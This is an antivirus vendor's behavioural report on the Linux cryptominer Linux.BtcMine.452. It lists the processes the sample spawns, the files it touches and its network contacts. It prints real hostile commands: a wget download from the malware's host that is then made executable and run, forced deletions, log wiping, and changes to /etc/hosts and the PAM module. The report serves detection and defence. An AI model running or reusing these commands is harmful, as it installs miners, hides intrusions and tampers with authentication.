Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Linux.BtcMine.452
Добавлен в вирусную базу Dr.Web:
2020-10-11
Описание добавлено:
2020-10-10
Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
sh -c md5sum /usr/bin/pamdicks
md5sum /usr/bin/pamdicks
sh -c wget -c http://a.powerofwish.com/up-sugar -O /var/lib/up && chmod 755 /var/lib/up && /var/lib/up
wget -c http://a.powerofwish.com/up-sugar -O /var/lib/up
chmod 755 /var/lib/up
/var/lib/up
sh -c rm -f /usr/bin/pamdicks 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks
sh -c rm -f /usr/bin/pamdicks.org 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org
sh -c rm -f /usr/bin/pamdicks.org1 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org1
sh -c rm -f /usr/bin/pamdicks.org2 1> /dev/null 2>&1
rm -f /usr/bin/pamdicks.org2
sh -c rm -rf /tmp/up 1> /dev/null 2>&1
rm -rf /tmp/up
sh -c rm -rf /var/lib//up 1> /dev/null 2>&1
rm -rf /var/lib//up
sh -c /usr/bin/pamdicks
/usr/bin/pamdicks
sh -c rm -f /etc/hosts.old
rm -f /etc/hosts.old
sh -c echo > /var/log/messages
sh -c rm -rf /tmp/chkmem 1> /dev/null 2>&1
rm -rf /tmp/chkmem
sh -c rm -rf /var/lib/chkmem 1> /dev/null 2>&1
rm -rf /var/lib/chkmem
Performs operations with the file system:
Modifies file access rights:
/var/lib/up
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
Creates or modifies files:
/var/lib/up
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
/etc/hosts
/lib/x86_64-linux-gnu/security/pam_unix.so
/var/run/bioset
/run/bioset
/var/log/messages
Deletes files:
/usr/bin/pamdicks
/usr/bin/pamdicks.org
/usr/bin/pamdicks.org1
/usr/bin/pamdicks.org2
/tmp/up
/var/lib//up
/etc/hosts.old
/tmp/chkmem
/var/lib/chkmem
Network activity:
Establishes connection:
<LOCAL_DNS_SERVER>
[2#######0:3036::ac43:d2fb]:0
[2#######0:3036::681b:8039]:0
[2#######0:3035::681b:8139]:0
10#.#7.129.57:0
10#.#7.128.57:0
17#.##.210.251:0
39.###.233.58:3366
HTTP GET requests:
a.######fwish.com/up-sugar
DNS ASK:
a.####rofwish.com
po##.##uminerpool.com
su###.ss.dxpool.com
Sends data to the following servers:
Receives data from the following servers:
Рекомендации по лечению
Linux
Демо бесплатно
На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK